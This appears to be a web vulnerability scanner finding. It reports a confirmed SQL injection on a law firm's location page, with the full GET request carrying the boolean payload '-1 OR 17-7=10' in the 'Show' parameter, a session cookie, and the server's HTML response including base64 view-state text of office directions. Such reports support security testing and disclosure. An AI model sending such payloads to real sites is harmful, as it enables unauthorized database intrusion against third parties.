JcPkZvbGxvdyBzaWducyBmb3IgTmV3YXJrIEFpcnBvcnQsIEV4aXQgNTcuIEZvbGxvdyBzaWducyBmb3IgZm9yIFJvdXRlIDIxIOKAkyBOZXdhcmssJm5ic3BcO292ZXIgYnJpZGdlIG9udG8gUm91dGUgMjEgTm9ydGggd2hpY2ggYmVjb21lcyBNY0NhcnRlciBIaWdod2F5LiBQcm9jZWVkIGFwcHJveGltYXRlbHkgMSYjMTg5XDsgbWlsZXMgdG8gdGhlIGludGVyc2VjdGlvbiBvZiBNY0NhcnRlciBIaWdod2F5LyBFZGlzb24gUGxhY2UuJm5ic3BcOyBNYWtlIGEgbGVmdCBvbnRvIChFZGlzb24gUGxhY2UpIGFuZCBwcm9jZWVkIHRvJm5ic3BcO3RoZSBuZXh0IHRyYWZmaWMgbGlnaHQgd2hpY2ggaXMmbmJzcFw7KE11bGJlcnJ5IFN0cmVldCkmbmJzcFw7IE1ha2UgYSByaWdodCBvbnRvIE11bGJlcnJ5IFN0cmVldCBhbmQgcHJvY2VlZCB0byB0aGUgbmV4dCBpbnRlcnNlY3Rpb24gd2hpY2ggaXMoIE11bGJlcnJ5IFN0cmVldC9NYXJrZXQgU3RyZWV0KSZuYnNwXDsgTWFrZSBhIHJpZ2h0IHR1cm4mbmJzcFw7b250byAoTWFya2V0KSZuYnNwXDthbmQgYmVhciBkaWFnb25hbGx5IGFjcm9zcyZuYnNwXDt0b3dhcmRzIHlvdXIgbGVmdCZuYnNwXDt0byBnZXQgaW50byB0aGUgbGVmdCBoYW5kIHR1cm4gbGFuZS4mbmJzcFw7IE1ha2UgYSBsZWZ0IHR1cm4mbmJzcFw7aW50byB0aGUgbW91dGggb2YgdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuJm5ic3BcOyBBIHNlY3VyaXR5IG9mZmljZXIgd2lsbCBtZWV0IHlvdSBhdCB5b3VyIHZlaGljbGUgdG8gY2hlY2sgeW91ciBpZGVudGlmaWNhdGlvbiBjcmVkZW50aWFscy4mbmJzcFw7IFBsZWFzZSBwYXJrIHlvdXIgdmVoaWNsZSBpbiB0aGUgb3V0ZG9vciB2aXNpdG9ycycgcGFya2luZyBsb3QuJm5ic3BcOyBQbGVhc2UgcHJvY2VlZCB0byB0aGUgMTV0aCBGbG9vciBSZWNlcHRpb24gRGVzaywgR2F0ZXdheSBJVi5cPC9mb29cPlw8L3BcPg0KXDxwXD5cPGZvbyBjb2xvcj0jMDAwMDgwIHNpemU9NFw+XDxzdHJvbmdcPlJvdXRlIDMgb3IgUm91dGUgMjE6IFw8L3N0cm9uZ1w+XDwvZm9vXD5cPGZvbyBzaXplPTJcPkZyb20gUnQuIDMsIHRha2UgUm91dGUgMjEgU291dGggYWJvdXQgNCBtaWxlcyBhbmQgdGhlbiBSb3V0ZSAyMSBiZWNvbWVzIGEgNC1sYW5lIG5vbi1kaXZpZGVkIGhpZ2h3YXkuIEZyb20gdGhpcyBwb2ludCwgcHJvY2VlZCAxJiMxODlcOyBtaWxlcyB0byB0aGUgaW50ZXJzZWN0aW9uIG9mIE1jQ2FydGVyIEhpZ2h3YXkvTWFya2V0IFN0cmVldC4gVHVybiByaWdodCBhdCB0aGUgbGlnaHQgb250byAoTWFya2V0IFN0cmVldCkmbmJzcFw7IFByb2NlZWQgYXBwcm94aW1hdGVseSAxNTAgZmVldCB0dXJuaW5nIHJpZ2h0IGludG8gdGhlIG1vdXRoIG9mIHRoZSByZWFyIGRyaXZld2F5IGVudHJhbmNlLiZuYnNwXDsoVGhlIGVudHJhbmNlIHRvIHRoZSZuYnNwXDtkcml2ZXdheSZuYnNwXDtpcyBsb2NhdGVkIGp1c3QmbmJzcFw7YmVmb3JlIHRoZSBuZXh0IHRyYWZmaWMgbGlnaHQpLiZuYnNwXDtBIHNlY3VyaXR5IG9mZmljZXIgd2lsbCBtZWV0IHlvdSBhdCB5b3VyIHZlaGljbGUgdG8gY2hlY2sgeW91ciBpZGVudGlmaWNhdGlvbiBjcmVkZW50aWFscy4mbmJzcFw7IFBsZWFzZSBwYXJrIHlvdXIgdmVoaWNsZSBpbiB0aGUgb3V0ZG9vciB2aXNpdG9ycycgcGFya2luZyBsb3QuJm5ic3BcOyBQbGVhc2UgcHJvY2VlZCB0byB0aGUgMTV0aCBGbG9vciBSZWNlcHRpb24gRGVzaywgR2F0ZXdheSBJVi5cPGJyXD5cPGJyXD5cPGZvbyBjb2xvcj0jMDAwMDgwIHNpemU9NFw+XDxzdHJvbmdcPkZyb20gUGVubnN5bHZhbmlhIG9yIFdlc3Rlcm4gTkogdmlhIFJ0LiA4MCBFYXN0Olw8L3N0cm9uZ1w+XDwvZm9vXD5cPC9wXD4NClw8cFw+XDxmb28gc2l6ZT0yXD5Sb3V0ZSA4MCBFYXN0IG9udG8gUm91dGUgMjgwIEVhc3QuIFByb2NlZWQgYXBwcm94aW1hdGVseSAxNCBtaWxlcyB1bnRpbCBSb3V0ZSAyODAgZm9ya3MuIEZvbGxvdyBzaWducyB0YWtpbmcgSS0yODAgRWFzdC4gV2hlbiBSb3V0ZSAyODAgZm9ya3MgLS0gc3RheSByaWdodCwgZm9sbG93aW5nIHNpZ25zIGZvciBIYXJyaXNvbi4gRXhpdCBhdCAxNSAoUnQuIDIxIFNvdXRoLURvd250b3duKS4gUHJvY2VlZCB0byB0aGUgYm90dG9tIG9mIHRoZSByYW1wLiBUdXJuIHJpZ2h0IG9udG8gUnQuIDIxIChNY0NhcnRlciBIaWdod2F5KSBhbmQgcHJvY2VlZCAxIG1pbGUgdG8gdGhlJm5ic3BcO2ludGVyc2VjdGlvbiBvZiggTWNDYXJ0ZXIgSGlnaHdheS9NYXJrZXQgU3RyZWV0KSZuYnNwXDsgTWFrZSBhIHJpZ2h0IGF0IHRoZSBsaWdodCBvbnRvIChNYXJrZXQgU3RyZWV0KSZuYnNwXDsgUHJvY2VlZCBhcHByb3hpbWF0ZWx5IDE1MCBmZWV0IHR1cm5pbmcgcmlnaHQgaW50byB0aGUgbW91dGggb2YgdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuJm5ic3BcOyAoVGhlIGVudHJhbmNlIHRvIHRoZSBkcml2ZXdheSBpcyBsb2NhdGVkIGp1c3QgYmVmb3JlIHRoZSBuZXh0IHRyYWZmaWMgbGlnaHQpLiZuYnNwXDsgQSBzZWN1cml0eSBvZmZpY2VyIHdpbGwgbWVldCB5b3UgYXQgeW91ciB2ZWhpY2xlIHRvIGNoZWNrIHlvdXIgaWRlbnRpZmljYXRpb24gY3JlZGVudGlhbHMuJm5ic3BcOyBQbGVhc2UgcGFyayB5b3VyIHZlaGljbGUgaW4gdGhlIG91dGRvb3IgdmlzaXRvcnMnIHBhcmtpbmcgbG90LiZuYnNwXDsgUGxlYXNlIHByb2NlZWQgdG8gdGhlJm5ic3BcOzE1dGggRmxvb3IgUmVjZXB0aW9uIERlc2ssIEdhdGV3YXkgSVYuXDwvZm9vXD5cPC9wXD4NClw8cFw+XDxzdHJvbmdcPlw8Zm9vIGNvbG9yPSMwMDAwODAgc2l6ZT00XD5Gcm9tIFBlbm5zeWx2YW5pYSBvciBXZXN0ZXJuIE5KIHZpYSBSdC4mbmJzcFw7NzggRWFzdDpcPC9mb29cPiBcPC9zdHJvbmdcPlw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlw8Zm9vIHNpemU9Mlw+XDxmb28gc2l6ZT0yXD5cPGZvbyBzaXplPTJcPlJ0XDwvZm9vXD5cPC9zbWFsbFw+LiA3OCBFYXN0LiBGb2xsb3cgc2lnbnMgZm9yIE5ld2FyayBBaXJwb3J0LCBFeGl0IDU3LiBGb2xsb3cgc2lnbnMgZm9yIGZvciBSb3V0ZSAyMSDigJMgTmV3YXJrLCZuYnNwXDtvdmVyIGJyaWRnZSBvbnRvIFJvdXRlIDIxIE5vcnRoIHdoaWNoIGJlY29tZXMgTWNDYXJ0ZXIgSGlnaHdheS4gUHJvY2VlZCBhcHByb3hpbWF0ZWx5IDEmIzE4OVw7IG1pbGVzIHRvIHRoZSBpbnRlcnNlY3Rpb24gb2YgTWNDYXJ0ZXIgSGlnaHdheS9FZGlzb24gUGxhY2UuJm5ic3BcOyBNYWtlIGEgbGVmdCBhdCB0aGUgbGlnaHQgb250byAoRWRpc29uIFBsYWNlKSBhbmQgcHJvY2VlZCB0byB0aGUgbmV4dCZuYnNwXDt0cmFmZmljIGxpZ2h0IHdoaWNoIGlzIChNdWxiZXJyeSBTdHJlZXQpJm5ic3BcOyBNYWtlIGEgcmlnaHQgb250byAoTXVsYmVycnkgU3RyZWV0KSBhbmQgcHJvY2VlZCB0byB0aGUgbmV4dCBsaWdodCB3aGljaCBpcyAoTWFya2V0IFN0cmVldCkmbmJzcFw7IE1ha2UgYSByaWdodCBvbnRvJm5ic3BcOyhNYXJrZXQgU3RyZWV0KSBhbmQmbmJzcFw7YmVhciBkaWFnb25hbGx5IGFjcm9zcyB0b3dhcmRzIHlvdXIgbGVmdCB0byBnZXQgaW50byB5b3VyIGxlZnQgaGFuZCB0dXJuIGxhbmUuJm5ic3BcOyBNYWtlIGEgbGVmdCBpbnRvIHRoZSZuYnNwXDttb3V0aCBvZiB0aGUgcmVhciBkcml2ZXdheSBlbnRyYW5jZS4mbmJzcFw7IEEgc2VjdXJpdHkgb2ZmaWNlciB3aWxsIG1lZXQgeW91IGF0IHlvdXIgdmVoaWNsZSB0byZuYnNwXDtjaGVjayB5b3VyIHNlY3VyaXR5IGNyZWRlbnRpYWxzLiZuYnNwXDsgUGxlYXNlIHBhcmsgeW91ciB2ZWhpY2xlIGluIHRoZSBvdXRkb29yIHZpc2l0b3JzJyBwYXJraW5nIGxvdC4mbmJzcFw7IFBsZWFzZSBwcm9jZWVkIHRvIHRoZSAxNXRoIEZsb29yIFJlY2VwdGlvbiBEZXNrLCBHYXRld2F5IElWLiZuYnNwXDtcPC9mb29cPlw8L3NtYWxsXD5cPC9mb29cPlw8L3BcPlw8Zm9vIHNpemU9Mlw+DQpcPHAgYWxpZ249bGVmdFw+XDxmb28gY29sb3I9IzAwMDA4MCBzaXplPTRcPlw8c3Ryb25nXD5Gcm9tIE5ldyBZb3JrIENpdHk6XDwvc3Ryb25nXD5cPC9mb29cPlw8L3BcPg0KXDxwIGFsaWduPWxlZnRcPlw8Zm9vIGNvbG9yPSMwMDAwODAgc2l6ZT00XD5cPHN0cm9uZ1w+VmlhIHRoZSBIb2xsYW5kIFR1bm5lbDogXDwvc3Ryb25nXD5UYWtlIHRoZSBcPC9mb29cPlw8Zm9vIHNpemU9Mlw+SG9sbGFuZCBUdW5uZWwgdG8gTmV3IEplcnNleSBUdXJucGlrZSBOb3J0aCB0byBFeGl0IDE1VyAtIG9udG8gUm91dGUgMjgwIFdlc3QuIENvbnRpbnVlIGFwcHJveGltYXRlbHkgMiYjMTg5XDsgbWlsZXMgdG8gZXhpdCAxNSAtIFJvdXRlIDIxIFNvdXRoLU5ld2Fyay4gUHJvY2VlZGluZyBkb3duIGV4aXQgcmFtcCBzdGF5IHRvIHlvdXIgbGVmdCBmb2xsb3dpbmcgc2lnbnMgZm9yIFJ0LiAyMSBTb3V0aCBhbmQgdGhlIE4uIEouIFBlcmZvcm1pbmcgQXJ0cyBDZW50ZXIgKHNoYXJwIGN1cnZlIHRvIHRoZSBsZWZ0KSB0byBib3R0b20gb2YgcmFtcC4gVHVybiByaWdodCAoTWNDYXJ0ZXIgSGlnaHdheSkgYW5kIGNvbnRpbnVlIGFwcHJveGltYXRlbHkgMSBtaWxlIHRvIGludGVyc2VjdGlvbiBvZiZuYnNwXDsoTWNDYXJ0ZXIgSGlnaHdheS9NYXJrZXQgU3RyZWV0KSZuYnNwXDsmbmJzcFw7IE1ha2UgYSByaWdodCBhdCB0aGUgbGlnaHQgb250byAoTWFya2V0IFN0cmVldCkgYW5kIHByb2NlZWQgYXBwcm94aW1hdGVseSAxNTAgZmVldCB0dXJuaW5nIHJpZ2h0IGludG8gdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuJm5ic3BcOyAoVGhlIGVudHJhbmNlIHRvIHRoZSBkcml2ZXdheSBpcyBsb2NhdGVkIGp1c3QgYmVmb3JlIHRoZSBuZXh0IHRyYWZmaWMgbGlnaHQpLiZuYnNwXDsgQSBzZWN1cml0eSBvZmZpY2VyIHdpbGwgbWVldCB5b3UgYXQgeW91ciB2ZWhpY2xlIHRvIGNoZWNrIHlvdXIgaWRlbnRpZmljYXRpb24gY3JlZGVudGlhbHMuJm5ic3BcOyBQbGVhc2UgcGFyayB5b3VyIHZlaGljbGUgaW4gdGhlIG91dGRvb3IgdmlzaXRvcnMnIHBhcmtpbmcgbG90LiZuYnNwXDsgUGxlYXNlIHByb2NlZWQgdG8gdGhlJm5ic3BcOzE1dGggRmxvb3IgUmVjZXB0aW9uIERlc2ssIEdhdGV3YXkgSVYuJm5ic3BcO1w8L2Zvb1w+XDwvcFw+DQpcPHAgYWxpZ249bGVmdFw+XDxmb28gc2l6ZT00XD5cPHN0cm9uZ1w+VmlhIHRoZSBMaW5jb2xuIFR1bm5lbDpcPC9zdHJvbmdcPiBcPC9mb29cPlw8Zm9vIHNpemU9Mlw+Rm9sbG93IHNpZ25zIGZvciBOSiBUdXJucGlrZSBTb3V0aCB0byBFeGl0IDE1Vy1Sb3V0ZSAyODAgV2VzdC4gQ29udGludWUgYXBwcm94aW1hdGVseSAyJiMxODlcOyBtaWxlcyB0byBleGl0IDE1IC0gUm91dGUgMjEgU291dGgtTmV3YXJrLiBQcm9jZWVkaW5nIGRvd24gZXhpdCByYW1wIHN0YXkgdG8geW91ciBsZWZ0IGZvbGxvd2luZyBzaWducyBmb3IgUnQuIDIxIFNvdXRoIGFuZCB0aGUgTi4gSi4gUGVyZm9ybWluZyBBcnRzIENlbnRlciAoc2hhcnAgY3VydmUgdG8gdGhlIGxlZnQpIHRvIGJvdHRvbSBvZiByYW1wLiBUdXJuIHJpZ2h0IChNY0NhcnRlciBIaWdod2F5KSBhbmQgY29udGludWUgYXBwcm94aW1hdGVseSAxIG1pbGUgdG8gaW50ZXJzZWN0aW9uIG9mIChNY0NhcnRlciBIaWdod2F5L01hcmtldCBTdHJlZXQpLiZuYnNwXDsgTWFrZSBhIHJpZ2h0IG9udG8gKE1hcmtldCBTdHJlZXQpIGFuZCBwcm9jZWVkIGFwcHJveGltYXRlbHkgMTUwIGZlZXQgdHVybmluZyByaWdodCBpbnRvIHRoZSBtb3V0aCBvZiB0aGUgcmVhciBkcml2ZXdheSBlbnRyYW5jZS4mbmJzcFw7IChUaGUgZW50cmFuY2UgdG8gdGhlIGRyaXZld2F5IGlzIGxvY2F0ZWQganVzdCBiZWZvcmUgdGhlIG5leHQmbmJzcFw7dHJhZmZpYyBsaWdodCkuJm5ic3BcOyZuYnNwXDtBIH..
- /new/showlocationnew.aspx

/new/showlocationnew.aspx CONFIRMED

http://www.mccarter.com/new/showlocationnew.aspx?PrintPage=True&Show=-1+OR+17-7%3d10&sortby=3&by=3&t..

Parameters

Parameter Type Value
PrintPage GET True
Show GET -1 OR 17-7=10
sortby GET 3
by GET 3
title GET 3
related GET 3

Request

GET /new/showlocationnew.aspx?PrintPage=True&Show=-1+OR+17-7%3d10&sortby=3&by=3&title=3&related=3 HTTP/1.1
Referer: http://www.mccarter.com/new/homenew.aspx?searchlink=showlocationnew.aspx&show=1433
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: www.mccarter.com
Cookie: ASP.NET_SessionId=dovbcr45tyczie45c0bmue45
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 12 May 2011 16:22:23 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 34224



<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML>
<HEAD>

<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<META NAME="ROBOTS" CONTENT="NOYDIR,NOODP">
<META NAME="KEYWORDS" CONTENT="McCarter,McCarter & English,McCarter and English,McCarter English">
<META NAME="DESCRIPTION" CONTENT="McCarter & English, LLP is a firm of over 400 lawyers with offices in Boston, Hartford, Stamford, New York City, Newark, Philadelphia and Wilmington.">
<script language="JavaScript" type="text/JavaScript">
<!--
function OpenWindow(url, name,features )
{
window.open(url, name,features)
}

function MM_preloadImages() { //v3.0
var d=document; if(d.images){ if(!d.MM_p) d.MM_p=new Array();
var i,j=d.MM_p.length,a=MM_preloadImages.arguments; for(i=0; i<a.length; i++)
if (a[i].indexOf("#")!=0){ d.MM_p[j]=new Image; d.MM_p[j++].src=a[i];}}
}

function MM_swapImgRestore() { //v3.0
var i,x,a=document.MM_sr; for(i=0;a&&i<a.length&&(x=a[i])&&x.oSrc;i++) x.src=x.oSrc;
}

function MM_findObj(n, d) { //v4.01
var p,i,x; if(!d) d=document; if((p=n.indexOf("?"))>0&&parent.frames.length) {
d=parent.frames[n.substring(p+1)].document; n=n.substring(0,p);}
if(!(x=d[n])&&d.all) x=d.all[n]; for (i=0;!x&&i<d.forms.length;i++) x=d.forms[i][n];
for(i=0;!x&&d.layers&&i<d.layers.length;i++) x=MM_findObj(n,d.layers[i].document);
if(!x && d.getElementById) x=d.getElementById(n); return x;
}

function MM_swapImage() { //v3.0
var i,j=0,x,a=MM_swapImage.arguments; document.MM_sr=new Array; for(i=0;i<(a.length-2);i+=3)
if ((x=MM_findObj(a[i]))!=null){document.MM_sr[j++]=x; if(!x.oSrc) x.oSrc=x.src; x.src=a[i+2];}
}

function MM_reloadPage(init) { //reloads the window if Nav4 resized
if (init==true) with (navigator) {if ((appName=="Netscape")&&(parseInt(appVersion)==4)) {
document.MM_pgW=innerWidth; document.MM_pgH=innerHeight; onresize=MM_reloadPage; }}
else if (innerWidth!=document.MM_pgW || innerHeight!=document.MM_pgH) location.reload();
}
MM_reloadPage(true);
//-->
</script>
<script>
function MM_jumpMenu(targ,selObj,restore){ //v3.0
eval(targ+".location='"+selObj.options[selObj.selectedIndex].value+"'");
if (restore) selObj.selectedIndex=0;
}
</script>
<script>
function emailWarning(){
//str = 'NOTICE.  These materials have been prepared by McCarter &amp; English, LLP for ' +
// 'informational purposes only and are not legal advice.  This information is not ' +
// 'intended to create, and receipt of it does not constitute, a lawyer-client ' +
// 'relationship.  You should not act upon this information without seeking ' +
// 'professional counsel.  In addition, we cannot represent you until we know that ' +
// 'doing so will not create a conflict of interest.  Nor can we treat unsolicited ' +
// 'information as confidential. \n\nAccordingly, please do not send us any ' +
// 'information about any matter that may involve you until you receive a ' +
// 'written statement from us that we represent you (an "engagement letter").\n\nBy ' +
// 'clicking "OK" you are confirming that you have read and understand this notice';

str = 'The McCarter & English website is for informational purposes only. We do not provide legal advice on this website. We can provide legal advice only to our clients in specific inquiries that they address to us. If you are interested in becoming a client, please contact us, but do not send us any information about your specific legal question. We cannot serve as your lawyers until we establish an attorney-client relationship, which can occur only after we follow procedures within our firm and after we agree to the terms of representation.'

return(confirm(str));
}
</script>
<link href="stylesnormal.css" rel="stylesheet" type="text/css">
<link href="css/me_allnew.css" rel="stylesheet" type="text/css">
<SCRIPT language="javascript" src="SlideMenuNew.js" type="text/javascript"></SCRIPT>
<SCRIPT language="javascript" src="MM.js" type="text/javascript"></SCRIPT>
<script>alpha = ['A','B','C','D','E','F','G','H','I','J','K','L','M','N','O','P','Q','R','S','T','U','V','W','X','Y','Z'];</script>
<script language="javascript" type="text/javascript">
function decryptString(str){
strLength = str.length;
strKey = "pwmeucnwskdweiwoeixmewuwnexmcvhknrd";
keyLength = strKey.length;
decryptedStr = "";
var i;
for(i = 0;i<strLength;i++){
if(str.charAt(i) != "?"){
offset = alpha.join('').indexOf(strKey.charAt(i % keyLength).toUpperCase());
charIndex = alpha.join('').indexOf(str.charAt(i).toUpperCase());
//alert(charIndex);
plainTextIndex = (charIndex - offset);
if(plainTextIndex < 0){
while(plainTextIndex < 0){
plainTextIndex = (alpha.length) + plainTextIndex; //Add cuz PlainTextIndex is negative
}
}else{
plainTextIndex = plainTextIndex % (alpha.length);
}
if(charIndex > -1){
tmpChar = alpha[plainTextIndex];
}else{
tmpChar = str.charAt(i).toUpperCase();
}
if(str.charAt(i).toUpperCase() != str.charAt(i)) tmpChar = tmpChar.toLowerCase();
decryptedStr = decryptedStr + tmpChar;
}else{
for(j=i;j<strLength;j++){
decryptedStr = decryptedStr + str.charAt(j);
}
break;
}
}
return decryptedStr;
}
function decryptAll(){
var i;
for(i=0;i<document.links.length;i++){
if(document.links[i].protocol == "mailto:" && document.links[i].getAttribute("encrypted") == "true"){
document.links[i].href = "mailto:" + decryptString(document.links[i].href.substring(document.links[i].href.indexOf(':')+1));
if(document.links[i].innerHTML.indexOf('@') > 0){
if(document.links[i].innerHTML.indexOf('?') > 0){
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1,document.links[i].href.indexOf('?')-document.links[i].href.indexOf(':')+2);
}else{
document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
}
}
//if(document.links[i].innerHTML.indexOf('mailto:') > 0) document.links[i].innerHTML = document.links[i].href.substring(document.links[i].href.indexOf(':')+1);
document.links[i].setAttribute("encrypted","false");
document.links[i].style.visibility = '';
}
}
document.body.onmouseover = function(){};
}
</script>
<SCRIPT language="JavaScript" type="text/javascript">
var menu1;
var menu2;
var menu3;
var menu4;
var menu5;
var menu6;
function buildMenus(){
menu1 = new ypSlideOutMenu("menu1", "", '','', 150, 100);
menu2 = new ypSlideOutMenu("menu2", "", '','', 190, 100);
menu3 = new ypSlideOutMenu("menu3", "", '','', 150, 100);
menu4 = new ypSlideOutMenu("menu4", "", '','', 150, 125);
menu5 = new ypSlideOutMenu("menu5", "", '','', 150, 100);
menu6 = new ypSlideOutMenu("menu6", "", '','', 150, 125);
}
buildMenus();
function repositionMenus(){
}
//window.onresize = repositionMenus;
</SCRIPT>

<style type="text/css">
P,TD,DIV,SPAN {
COLOR: #666666;
font-family: Arial;
font-size: 11px;
}
FONT {
COLOR: #666666;
font-family: Arial;
font-size: 11px;
}
body {
<!--SCROLLBAR-FACE-COLOR: #ffffff; SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; SCROLLBAR-SHADOW-COLOR: #ffffff; SCROLLBAR-3DLIGHT-COLOR: #969696; SCROLLBAR-ARROW-COLOR: #000000; SCROLLBAR-TRACK-COLOR: #969696; SCROLLBAR-DARKSHADOW-COLOR: #000000;-->
scrollbar-face-color:#ffffff;scrollbar-arrow-color:#000000;scrollbar-track-color:#ffffff;scrollbar-shadow-color:#ffffff;scrollbar-highlight-color:#ffffff;scrollbar-3dlight-color:#ffffff;scrollbar-darkshadow-color:#ffffff;
}
</style>
</HEAD>
<body vLink="#666666" aLink="#666666" link="#666666" style="Margin-left:0;Margin-top:10;margin-bottom:0">
<form name="Form1" method="post" action="showlocationnew.aspx?PrintPage=True&amp;Show=-1+OR+17-7%3d10&amp;sortby=3&amp;by=3&amp;title=3&amp;related=3" id="Form1">
<input type="hidden" name="__VIEWSTATE" value="dDwxMDQyMzE4MTAwO3Q8O2w8aTwxPjtpPDM+Oz47bDx0PDtsPGk8MD47PjtsPHQ8cDxsPFRleHQ7PjtsPFw8c2NyaXB0XD5hbHBoYSA9IFsnQScsJ0InLCdDJywnRCcsJ0UnLCdGJywnRycsJ0gnLCdJJywnSicsJ0snLCdMJywnTScsJ04nLCdPJywnUCcsJ1EnLCdSJywnUycsJ1QnLCdVJywnVicsJ1cnLCdYJywnWScsJ1onXVw7XDwvc2NyaXB0XD47Pj47Oz47Pj47dDw7bDxpPDA+O2k8MT47PjtsPHQ8O2w8aTwzPjs+O2w8dDxwPHA8bDxUZXh0Oz47bDxcPHBcPlw8c3Ryb25nXD5WaWV3IG91ciBcPGEgY2xhc3M9bGlua19zbV9sdGJsdWUgaHJlZj0iYmlvc25ldy5hc3B4P1NlYXJjaD1UcnVlJmFtcFw7TG9jYXRpb249MTQyNiIgYmlvc25ldy5hc3B4P1NlYXJjaD0nVHJ1ZSZhbXBcO0xvY2F0aW9uPTI1MzAiJyB3d3cyIHd3dy5tY2NhcnRlci5jb20gaHR0cDpcPk5FV0FSSyZuYnNwXDtPZmZpY2UgTGF3eWVyc1w8L2FcPlw8L3N0cm9uZ1w+XDwvcFw+DQpcPHBcPlw8Zm9vIGZhY2U9QXJpYWwsSGVsdmV0aWNhIHNpemU9Mlw+XDxzdHJvbmdcPkRpcmVjdGlvbnMgdG8gdGhlIE5FV0FSSyBPZmZpY2U6XDwvc3Ryb25nXD5cPC9mb29cPlw8L3BcPg0KXDxwXD5cPGZvbyBmYWNlPUFyaWFsLEhlbHZldGljYSBzaXplPTJcPlw8c3Ryb25nXD5Gcm9tIHBvaW50cyBpbiBOZXcgSmVyc2V5Olw8L3N0cm9uZ1w+XDwvcFw+DQpcPHBcPlw8c3Ryb25nXD5HYXJkZW4gU3RhdGUgUGFya3dheTogXDwvc3Ryb25nXD5UYWtlIFw8Zm9vIHNpemU9Mlw+R2FyZGVuIFN0YXRlIFBhcmt3YXkgdG8gRXhpdCAxNDUuIEZvbGxvdyBzaWducyZuYnNwXDtvbnRvJm5ic3BcO1J0IDI4MCBFYXN0LiBXaGVuIDI4MCBmb3JrcyAtIHN0YXkgcmlnaHQsIGZvbGxvd2luZyBzaWducyBmb3IgSGFycmlzb24uIEV4aXQgYXQgMTUgKFJ0LiAyMSBTb3V0aC1Eb3dudG93bikuIFByb2NlZWQgdG8gdGhlIGJvdHRvbSBvZiB0aGUgcmFtcC4gVHVybiByaWdodCBvbnRvIFJ0LiAyMSAoTWNDYXJ0ZXIgSGlnaHdheSkgYW5kIHByb2NlZWQgMSBtaWxlIHRvIHRoZSBpbnRlcnNlY3Rpb24gTWNDYXJ0ZXIgSGlnaHdheS9NYXJrZXQgU3RyZWV0LiZuYnNwXDsgVHVybiByaWdodCBhdCB0aGUgaW50ZXJzZWN0aW9uIG9udG8gKE1hcmtldCBTdHJlZXQpJm5ic3BcOyBQcm9jZWVkIGFwcHJveGltYXRlbHkgMTUwIGZlZXQgdHVybmluZyZuYnNwXDtyaWdodCBhdCB0aGUgbW91dGggb2YgdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuIChUaGUgZW50cmFuY2UgdG8gdGhlIGRyaXZld2F5IGlzIGxvY2F0ZWQganVzdCZuYnNwXDtiZWZvcmUgdGhlIG5leHQgdHJhZmZpYyBsaWdodCkuJm5ic3BcOyBBIHNlY3VyaXR5IG9mZmljZXIgd2lsbCBtZWV0IHlvdSBhdCB5b3VyIHZlaGljbGUgdG8gY2hlY2smbmJzcFw7eW91ciBpZGVudGlmaWNhdGlvbiBjcmVkZW50aWFscy4mbmJzcFw7IFBsZWFzZSBwYXJrIHlvdXIgdmVoaWNsZSBpbiB0aGUgb3V0ZG9vciB2aXNpdG9ycycmbmJzcFw7cGFya2luZyBsb3QuJm5ic3BcOyBQbGVhc2UgcHJvY2VlZCZuYnNwXDt0byB0aGUmbmJzcFw7MTV0aCBmbG9vciBSZWNlcHRpb24gRGVzaywgR2F0ZXdheSBJVi5cPC9mb29cPlw8L3BcPg0KXDxwXD5cPHN0cm9uZ1w+Um91dGUgNzgvMjQgRWFzdDpcPC9zdHJvbmdcPiBcPGZvbyBzaXplPTJcPkZvbGxvdyBzaWducyBmb3IgTmV3YXJrIEFpcnBvcnQsIEV4aXQgNTcuIEZvbGxvdyBzaWducyBmb3IgZm9yIFJvdXRlIDIxIOKAkyBOZXdhcmssJm5ic3BcO292ZXIgYnJpZGdlIG9udG8gUm91dGUgMjEgTm9ydGggd2hpY2ggYmVjb21lcyBNY0NhcnRlciBIaWdod2F5LiBQcm9jZWVkIGFwcHJveGltYXRlbHkgMSYjMTg5XDsgbWlsZXMgdG8gdGhlIGludGVyc2VjdGlvbiBvZiBNY0NhcnRlciBIaWdod2F5LyBFZGlzb24gUGxhY2UuJm5ic3BcOyBNYWtlIGEgbGVmdCBvbnRvIChFZGlzb24gUGxhY2UpIGFuZCBwcm9jZWVkIHRvJm5ic3BcO3RoZSBuZXh0IHRyYWZmaWMgbGlnaHQgd2hpY2ggaXMmbmJzcFw7KE11bGJlcnJ5IFN0cmVldCkmbmJzcFw7IE1ha2UgYSByaWdodCBvbnRvIE11bGJlcnJ5IFN0cmVldCBhbmQgcHJvY2VlZCB0byB0aGUgbmV4dCBpbnRlcnNlY3Rpb24gd2hpY2ggaXMoIE11bGJlcnJ5IFN0cmVldC9NYXJrZXQgU3RyZWV0KSZuYnNwXDsgTWFrZSBhIHJpZ2h0IHR1cm4mbmJzcFw7b250byAoTWFya2V0KSZuYnNwXDthbmQgYmVhciBkaWFnb25hbGx5IGFjcm9zcyZuYnNwXDt0b3dhcmRzIHlvdXIgbGVmdCZuYnNwXDt0byBnZXQgaW50byB0aGUgbGVmdCBoYW5kIHR1cm4gbGFuZS4mbmJzcFw7IE1ha2UgYSBsZWZ0IHR1cm4mbmJzcFw7aW50byB0aGUgbW91dGggb2YgdGhlIHJlYXIgZHJpdmV3YXkgZW50cmFuY2UuJm5ic3BcOyBBIHNlY3VyaXR5IG9mZmljZXIgd2lsbCBtZWV0IHlvdSBhdCB5b3VyIHZlaGljbGUgdG8gY2hlY2sgeW91ciBpZGVudGlmaWNhdGlvbiBjcmVkZW50aWFscy4mbmJzcFw7IFBsZWFzZSBwYXJrIHlvdXIgdmVoaWNsZSBpbiB0aGUgb3V0ZG9vciB2aXNpdG9ycycgcGFya2luZyBsb3QuJm5ic3BcOyBQb